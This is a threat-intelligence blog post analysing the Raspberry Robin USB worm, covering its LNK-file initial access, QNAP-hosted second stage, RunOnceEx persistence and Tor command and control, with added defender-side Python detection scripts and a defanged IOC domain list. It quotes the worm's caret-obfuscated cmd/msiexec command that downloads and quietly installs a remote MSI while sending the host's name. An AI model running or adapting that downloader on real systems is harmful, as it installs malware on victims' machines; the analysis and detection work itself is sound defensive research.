Resurgent USB Malware: Battling Raspberry Robin
SenseOn has investigated a recent Raspberry Robin infection as part of our threat intelligence efforts.
In this article, our cybersecurity analyst team explores recent findings from this research.
Read on to see how our team leveraged SenseOn’s advanced telemetry to present security researchers and professionals with a new level of insight into the Raspberry Robin attack chain.
The Raspberry Robin Worm
First spotted in the wild in 2021, Raspberry Robin is worm-like malware that replicates itself through removable USB flash drives. In Q4 last year, Raspberry Robin was estimated to have compromised over 1,000 organisations per month.
Raspberry Robin infections start through a variety of methods. The most common involves infecting USB drives that are inserted into computers already infected with Raspberry Robin. Raspberry Robin then creates malicious LNK files (aka shortcuts) on the USB storage device which, when clicked, download a second stage. The second stage of the infection is hosted behind compromised QNAP NAS devices.
After the malware gains persistence it achieves command and control through Tor – it does not immediately attempt to extract financial gain from the compromise itself.
Broader reporting indicates that Raspberry Robin’s operators are an initial access broker who sells remote access to compromised systems to third parties, who may then launch Cobalt Strike or ransomware strains such as LockBit.
Initial Access
Raspberry Robin creates shortcuts known as LNK files in the root of USB removable media devices (i.e., a USB stick) connected to infected systems by using a technique identified by MITRE as Replication Through Removable Media (T1091).
The LNK files Raspberry Robin creates often use innocuous icons and names such as Explorer, Report or Update.
The shortcut target is set to open the Windows command line to download and install the second stage. This can occur automatically through an autorun.inf file or through User Execution.
The full target is shown below:
%WIndir%\sySTem32\cmd.EXe /D /v/rS^tA^R^T M^S^i^E^X^E^c e^h^T^y=^E^d -^Q^u^I^eT ^a^xQNK=^R^W^Z -P^a^ckag^E "hTTp[:]//q0[.]Wf:8080/AJyth/oVBh1234eABgjbGZlVdQpfnRJwW//!COmPUTeRName!" D^z^j^g^z=o^Y^z^j^b
In the target above, the LNK file uses the Windows command line to download the second stage via HTTP and install it via MSIExec.
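As an added example (not SenseOn’s code or tooling), the snippet below shows how a defender can normalise a caret-obfuscated shortcut target like the one above and pull out the indicators the article describes: cmd.exe started with delayed expansion, an msiexec launch, a quiet install, a remote -Package URL on port 8080, and the !COMPUTERNAME! token. The sample string is the article’s own target, kept defanged; the indicator names and the three-hit alert threshold are this example’s own assumptions.

```python
import re

# Constructed input: the LNK target quoted in the article, kept defanged
# ([:] and [.]) exactly as printed there, so the URL does not resolve.
SAMPLE_TARGET = (
    r'%WIndir%\sySTem32\cmd.EXe /D /v/rS^tA^R^T M^S^i^E^X^E^c e^h^T^y=^E^d '
    r'-^Q^u^I^eT ^a^xQNK=^R^W^Z -P^a^ckag^E '
    r'"hTTp[:]//q0[.]Wf:8080/AJyth/oVBh1234eABgjbGZlVdQpfnRJwW//!COmPUTeRName!" '
    r'D^z^j^g^z=o^Y^z^j^b'
)

# A harmless shortcut target for contrast (constructed).
BENIGN_TARGET = r'C:\Windows\explorer.exe'

# Indicator names are this example's own labels, not vendor rule names.
INDICATOR_PATTERNS = {
    # cmd.exe started with /v (delayed expansion), needed for !COMPUTERNAME!
    "cmd_delayed_expansion": re.compile(r"\bcmd\.exe\b.*\s/v\b", re.I),
    "msiexec_launch": re.compile(r"\bmsiexec\b", re.I),
    "quiet_install": re.compile(r"(?:^|\s)(?:-quiet|/quiet|/q)\b", re.I),
    # msiexec -Package pointing at a remote URL (defanged or live)
    "remote_package": re.compile(r'-package\s+"?https?(?:\[:\]|:)//', re.I),
    "port_8080": re.compile(r'https?(?:\[:\]|:)//[^\s"/]+:8080/', re.I),
    "hostname_in_url": re.compile(r"!computername!", re.I),
}
URL_RE = re.compile(r'https?(?:\[:\]|:)//[^\s"]+', re.I)


def strip_carets(cmdline: str) -> str:
    """Remove cmd.exe caret escapes that appear outside double quotes.

    cmd.exe treats ^ as an escape: the next character is taken literally,
    so M^S^i^E^X^E^c runs as MSiEXEc. Inside a double-quoted string the
    caret is an ordinary character, so those are preserved.
    """
    out, in_quotes, i = [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])   # keep the escaped char, drop the caret
            i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def analyse_lnk_target(target: str) -> dict:
    """Normalise a shortcut target and report which indicators it matches."""
    plain = strip_carets(target)
    hits = [name for name, pat in INDICATOR_PATTERNS.items() if pat.search(plain)]
    url = URL_RE.search(plain)
    return {
        "deobfuscated": plain,
        "url": url.group(0) if url else None,
        "indicators": hits,
        # Three independent indicators is this example's alert threshold.
        "suspicious": len(hits) >= 3,
    }


if __name__ == "__main__":
    for target in (SAMPLE_TARGET, BENIGN_TARGET):
        result = analyse_lnk_target(target)
        print(result["suspicious"], result["indicators"], result["url"])
```

Because matching is done on the de-obfuscated form, the same rules keep working when the actor changes which characters are caret-escaped or re-cases the keywords.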
The HTTP request includes the device’s hostname, as shown in the telemetry below.
The user agent seen in the HTTP request to download the second stage is “Windows Installer”. This is an indicator which can be used in other security tooling, for example by analysing proxy logs in a traditional SIEM.
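The proxy-log check described above, as an added example that is not part of the original article: it scores each request on the three observable traits the article reports (the “Windows Installer” user agent, a destination on port 8080, and the client’s own hostname appearing at the end of the URL path) and alerts when enough of them coincide. The log format, the weights and the threshold are this example’s assumptions, and the log lines are constructed; 203.0.113.10 is a documentation address standing in for a second-stage host.

```python
from urllib.parse import urlsplit

# Constructed proxy log (not real telemetry). Tab-separated fields:
# timestamp, client_ip, client_hostname, method, url, status, user_agent.
SAMPLE_PROXY_LOG = """\
2023-03-01T09:14:02Z\t10.1.4.22\tWS-FINANCE-07\tGET\thttp://203.0.113.10:8080/AJyth/oVBh1234eABgjbGZlVdQpfnRJwW//WS-FINANCE-07\t200\tWindows Installer
2023-03-01T09:14:05Z\t10.1.4.22\tWS-FINANCE-07\tGET\thttp://updates.example.com/agent.msi\t200\tWindows Installer
2023-03-01T09:15:11Z\t10.1.9.8\tWS-HR-02\tGET\thttp://intranet.example.com:8080/dashboard\t200\tMozilla/5.0
2023-03-01T09:16:40Z\t10.1.4.22\tWS-FINANCE-07\tGET\thttps://www.example.org/\t200\tMozilla/5.0
"""

# Weights and threshold are this example's own choices; tune them against
# local baselines (legitimate MSI downloads also use this user agent).
WEIGHTS = {"windows_installer_ua": 1, "port_8080": 1, "hostname_in_url": 2}
ALERT_THRESHOLD = 3
FIELDS = ("ts", "client_ip", "client_hostname", "method", "url", "status", "user_agent")


def parse_proxy_line(line: str):
    """Split one tab-separated log line into a dict, or None if malformed."""
    fields = line.rstrip("\r\n").split("\t")
    if len(fields) != len(FIELDS):
        return None
    return dict(zip(FIELDS, fields))


def score_event(ev: dict):
    """Return (score, reasons) for a single proxy event."""
    reasons = []
    if ev["user_agent"].strip() == "Windows Installer":
        reasons.append("windows_installer_ua")
    parts = urlsplit(ev["url"])
    try:
        port = parts.port
    except ValueError:          # garbage in the netloc, treat as unknown
        port = None
    if port == 8080:
        reasons.append("port_8080")
    # The downloader appends !COMPUTERNAME!, so the last path segment
    # equals the requesting machine's hostname.
    last_segment = parts.path.rstrip("/").split("/")[-1]
    if last_segment and last_segment.lower() == ev["client_hostname"].lower():
        reasons.append("hostname_in_url")
    return sum(WEIGHTS[r] for r in reasons), reasons


def detect(log_text: str) -> list:
    """Run the scoring over a whole log and return the events that alert."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_proxy_line(line)
        if ev is None:
            continue
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({**ev, "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_PROXY_LOG):
        print(alert["ts"], alert["client_hostname"], alert["score"], alert["reasons"])
```

The second and third constructed lines show why a single trait is not enough: a genuine MSI download also presents “Windows Installer”, and an internal web application can live on port 8080, but neither carries the client’s hostname in the URL.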
QNAP NAS Devices Hosting Second Stage
In every sample we analysed, the second stage was always downloaded over HTTP from a server listening on port 8080.
We found 36 recently used second-stage servers. Then, by reviewing the host history on Shodan, we established that every host appeared to be a compromised QNAP NAS device.
This is interesting because using compromised QNAP devices as proxies obscures the actual location of the server hosting the second stage.
By using a high number of proxies, this obfuscation technique hampers efforts to block the infection chain through common web-based filtering.
Whilst each host could have been accessed via an IP address, the threat actor had registered a domain name for each proxy. We noted significant diversity in the TLDs and registrars used.
Threat Actor Possibly Based In the Americas
SenseOn was able to record and analyse the time of day that command and control domain names were registered. Our team plotted a summary of the activity on the graph below.
Most domains we saw were registered in a timezone consistent with an actor based in the Americas.
Attribution is very difficult in cyber security, and this is just one indicator which should be weighed against other factors.
Second Stage Execution
The second stage in the infection chain involves an MSI file.
After a delay of more than 5 minutes, this file injects itself into explorer.exe. Long delays are a common anti-analysis method used to evade sandbox systems.
In the sample SenseOn studied, Raspberry Robin also exhibited debugger evasion and refused to execute in a virtual environment.
We then observed a range of malicious DLLs being loaded and used. The DLL names changed frequently and did not remain static.
The MSI used for the loader and the files used for persistence were heavily packed and encrypted.
These files were approximately 500MB, which may be a method to impair defences as some scanning engines won’t scan large files. Often these files will compress to less than 2MB.
Persistence via RunOnceEx Registry Keys
Persistence is achieved by creating a RunOnceEx Registry Key. RunOnceEx clears the registry key after it is run.
Both the name of the key and the filename are randomly generated.
The malware accesses the file constantly, and other processes cannot read it.
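An added example, not SenseOn’s tooling, for the two triage checks the last two sections suggest: enumerating RunOnceEx entries from a `reg export` dump and flagging those that point into user-writable folders, then measuring how well the referenced file compresses, since a ~500MB file that shrinks to a couple of megabytes is mostly padding. The registry dump, the random-looking key and file names, the user-writable prefix list and the ratio threshold are all this example’s own constructions; the padded sample file is generated locally so the code runs offline.

```python
import os
import re
import tempfile
import zlib

# Constructed `reg export` style dump (not from a real system). The first
# subkey mimics the article's description (random key name, random file
# name in a user-writable folder); the second is a setup-style entry.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\q7x2kd]
"vb19ps"="C:\\Users\\Public\\Libraries\\j4ncy.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001]
"Setup"="C:\\Windows\\System32\\oobe\\setup.exe"
"""

# Folder fragments this example treats as user-writable (assumption).
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")
KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')
PATH_RE = re.compile(r'[A-Za-z]:\\[^"|,\s]+')


def parse_runonceex(reg_text: str) -> list:
    """Return every value under a RunOnceEx subkey with the path it references."""
    entries, current = [], None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            name = key.group(1)
            current = name if "\\runonceex\\" in name.lower() else None
            continue
        if current is None:
            continue
        value = VALUE_RE.match(line)
        if not value:
            continue
        # reg export doubles backslashes and escapes quotes inside strings.
        command = value.group(2).replace('\\"', '"').replace("\\\\", "\\")
        found = PATH_RE.search(command)
        path = found.group(0) if found else None
        entries.append({
            "key": current.rsplit("\\", 1)[-1],
            "value_name": value.group(1),
            "command": command,
            "path": path,
            "user_writable": bool(path) and any(t in path.lower() for t in USER_WRITABLE),
        })
    return entries


def compression_ratio(path: str, chunk: int = 1 << 20):
    """Stream the file through zlib; return (size, compressed/size)."""
    comp = zlib.compressobj()
    total = packed = 0
    with open(path, "rb") as fh:
        while True:
            data = fh.read(chunk)
            if not data:
                break
            total += len(data)
            packed += len(comp.compress(data))
    packed += len(comp.flush())
    return total, (packed / total if total else 1.0)


def triage_file(path: str, large_threshold: int = 100 << 20, ratio_threshold: float = 0.05) -> dict:
    """Flag a large file that compresses to a tiny fraction of its size."""
    size, ratio = compression_ratio(path)
    return {"size": size, "ratio": ratio,
            "inflated": size >= large_threshold and ratio < ratio_threshold}


def make_padded_sample(path: str, padding_bytes: int = 4 << 20, payload_bytes: int = 16 << 10):
    """Write a constructed stand-in for a padded payload: zeros plus a little random data."""
    with open(path, "wb") as fh:
        fh.write(b"\0" * padding_bytes)
        fh.write(os.urandom(payload_bytes))


def demo_padded_file() -> dict:
    """Build the constructed sample in a temp dir and triage it with a 1 MiB threshold."""
    with tempfile.TemporaryDirectory() as tmp:
        sample = os.path.join(tmp, "sample.bin")
        make_padded_sample(sample)
        return triage_file(sample, large_threshold=1 << 20)


if __name__ == "__main__":
    for entry in parse_runonceex(SAMPLE_REG_EXPORT):
        print(entry["key"], entry["path"], "user-writable" if entry["user_writable"] else "system")
    print(demo_padded_file())
```

Streaming through `zlib.compressobj` keeps memory flat, so the same check can be pointed at a genuine 500MB file without loading it; on a live host the file lock the article mentions may stop the read, which is itself worth recording.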
Attempts to Open the Firewall
Requests were made to open the firewall via UPnP. The malware likely attempts to open a socket on the firewall via UPnP.
Command and Control
Command and control is achieved through the Tor network. Connections are made on average once every 60 seconds with a variance of +/- 60 seconds.
All command and control connections originate from either dllhost.exe or regsvr32.exe with a parent process of explorer.exe. As the connections go to the Tor network, they can be tough to detect and block using network information alone.
JA3 Fingerprint
The JA3 client fingerprint remained static as Raspberry Robin uses native Windows 10 sockets. This can provide a good pivot point for threat hunting, but it isn’t a high confidence indicator as other applications may use it.
Client Fingerprint
JA3 Hash: c12f54a3f91dc7bafd92cb59fe009a35
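The endpoint-plus-network hunt the last two sections describe, as an added example that is not SenseOn’s code: it groups outbound connections by process and parent, keeps only dllhost.exe or regsvr32.exe under explorer.exe, checks that the mean interval sits in the roughly 60-second window the article reports, and uses the JA3 hash above only to raise confidence rather than as a trigger on its own. The event schema, the interval bounds and the sample telemetry are this example’s own constructions; 198.51.100.0/24 is a documentation range.

```python
import statistics
from collections import defaultdict

# JA3 client fingerprint reported in the article (low confidence on its own).
RR_JA3 = "c12f54a3f91dc7bafd92cb59fe009a35"
C2_PROCESSES = {"dllhost.exe", "regsvr32.exe"}
C2_PARENT = "explorer.exe"
MIN_CONNECTIONS = 5
# Article: about one connection per 60 s, +/- 60 s. These bounds on the mean
# interval are this example's own interpretation of that window.
INTERVAL_BOUNDS = (20, 120)


def _series(process, parent, start, gaps, ja3, dst_ips):
    """Build a constructed connection series from a start time and gaps in seconds."""
    events, t = [], start
    for i, gap in enumerate([0] + gaps):
        t += gap
        events.append({"ts": t, "process": process, "parent": parent,
                       "dst_ip": dst_ips[i % len(dst_ips)], "dst_port": 443, "ja3": ja3})
    return events


# Constructed telemetry (not SenseOn data): a Tor-style beacon, a chatty
# updater sharing the JA3, and a system heartbeat from a different parent.
SAMPLE_EVENTS = (
    _series("dllhost.exe", "explorer.exe", 1_700_000_000,
            [45, 70, 95, 30, 60, 110, 20, 75, 55, 65, 90],
            RR_JA3, ["198.51.100.7", "198.51.100.21", "198.51.100.33"])
    + _series("updater.exe", "explorer.exe", 1_700_000_100,
              [5, 1800, 3, 2400], RR_JA3, ["198.51.100.50"])
    + _series("svchost.exe", "services.exe", 1_700_000_000,
              [60] * 8, "0" * 32, ["198.51.100.9"])
)


def find_beacons(events) -> list:
    """Return process/parent pairs whose outbound timing matches the C2 pattern."""
    by_proc = defaultdict(list)
    for ev in events:
        by_proc[(ev["process"].lower(), ev["parent"].lower())].append(ev)

    findings = []
    for (proc, parent), evs in by_proc.items():
        if proc not in C2_PROCESSES or parent != C2_PARENT or len(evs) < MIN_CONNECTIONS:
            continue
        ts = sorted(e["ts"] for e in evs)
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        mean_gap = statistics.mean(gaps)
        if not (INTERVAL_BOUNDS[0] <= mean_gap <= INTERVAL_BOUNDS[1]):
            continue
        ja3_match = any(e["ja3"] == RR_JA3 for e in evs)
        findings.append({
            "process": proc,
            "parent": parent,
            "connections": len(evs),
            "mean_interval_s": mean_gap,
            "max_interval_s": max(gaps),
            "distinct_destinations": len({e["dst_ip"] for e in evs}),
            "ja3_match": ja3_match,
            # JA3 corroborates; the process lineage and cadence are the trigger.
            "confidence": "medium" if ja3_match else "low",
        })
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_EVENTS):
        print(f)
```

The updater series in the constructed data carries the same JA3 but never fires, which is the point the article makes: native Windows sockets give many programs that fingerprint, so it belongs in the scoring, not in the trigger.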
Conclusion
Whilst the use of USB storage may be in decline in many industries, it is still heavily used in environments with Operational Technology (OT) or poor centralised controls, and malware like Raspberry Robin remains a serious cybersecurity threat.
As our analysis demonstrates, Raspberry Robin is an evasive malware strain that uses multiple layers of obfuscation to evade both static and dynamic analysis, making detection and reversing difficult.
Still, the scope of a compromise can be understood using a combination of network and endpoint telemetry through a tool like SenseOn.
Given time, Raspberry Robin will also pass the infected host to another group who may deploy payloads such as Cobalt Strike or ransomware. This multiplies the risk it poses to organisations.
As governments take action against ransomware groups we predict a rise in initial access brokers. They can profit by allowing others to take the higher-risk actions of monetising the compromise with ransomware or stealing sensitive data.
IOCs
Eznb[.]net
8t[.]pm
7d[.]rs
Zk[.]qa
27o[.]nl
5g7[.]at
H0[.]pm
1h3[.]me
0j[.]wf
Fgcz[.]net
5ky[.]xyz
0dz[.]me
M0[.]yt
6y[.]re
6xj[.]xyz
J68[.]info
Nt3[.]xyz
Zjc[.]bz
O7car[.]com
03s30[.]com
W0[.]pm
6uy[.]at
e0[.]wf
13j[.]me
Jrx[.]tw
Bcomb[.]net
5qy[.]ro
Jzm[.]pw
W4[.]nz
J5n[.]xyz
0i[.]pm
Vqdn[.]net
5v0[.]nl
N9fz[.]com
Kj1[.]xyz
6qo[.]at
8t[.]wf
Zxn[.]fyi